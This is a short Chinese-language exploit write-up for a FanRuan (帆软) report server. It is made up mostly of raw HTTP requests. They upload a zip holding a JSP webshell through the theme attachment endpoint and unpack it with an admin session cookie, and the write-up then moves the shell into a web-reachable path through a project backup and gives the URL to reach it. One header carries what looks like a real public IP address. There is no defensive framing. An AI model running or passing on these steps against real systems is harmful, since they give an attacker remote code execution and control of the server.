漏洞利用
帆软上传主题获取shell(管理系统-外观配置)
添加主题上传的压缩包中放入shell.jsp马 (没有添加主题功能直接构造数据包)
POST /WebReport/ReportServer?op=fr_attach&cmd=ah_upload&filename=test.zip&width=240&height=198 HTTP/1.1
Host: xxx
Content-Length: 749
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=AjaxUploadBoundary1638899444076, multipart/form-data
Accept: */*
Origin: https://xx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close------WebKitFormBoundaryNN5BrMluNxGE4HCB
Content-Disposition: form-data; name="FileData"; filename="test.zip"
Content-Type: application/zipzip内容
------WebKitFormBoundaryNN5BrMluNxGE4HCB--
注意:
此处用burpsuite “paster from file”压缩包会出问题,需要在burpsuite修改如下即可正常。
获取上传ID后通过接口通过下面的数据包释放主题。
POST /WebReport/ReportServer?op=fs_manager&cmd=save_theme HTTP/1.1
Host: xx
Cookie: JSESSIONID=82B5084E106B1F09978248EE247E1E84; fr_password=""; fr_remember=false
Content-Length: 49
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://60.222.220.228
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://xxx/WebReport/ReportServer?op=fs
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Cookie: JSESSIONID=7BC53BE2461251A5B8A2D097FFE8986D; fr_remember=false; fr_password=; fr_username=admin; td_cookie=3756473647id=f0757ae6-08fe-4704-9617-5dc7a3880096&serverID=
当上传压缩包名称为shell.zip则会将木马释放在
/webapps/WebReport/WEB-INF/resources/fstheme/fs-theme-test/目录下名称为app.jsp,但当前目录并非 web 目录,web 无法访问 webshell。
为了将 webshell 移动要 web 目录,需要整体工程备份,备份文件夹名称为“222”
/webapps/WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-app/ 路径下。
直接访问Shell地址:
http://xxxx/WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-test/app.jsp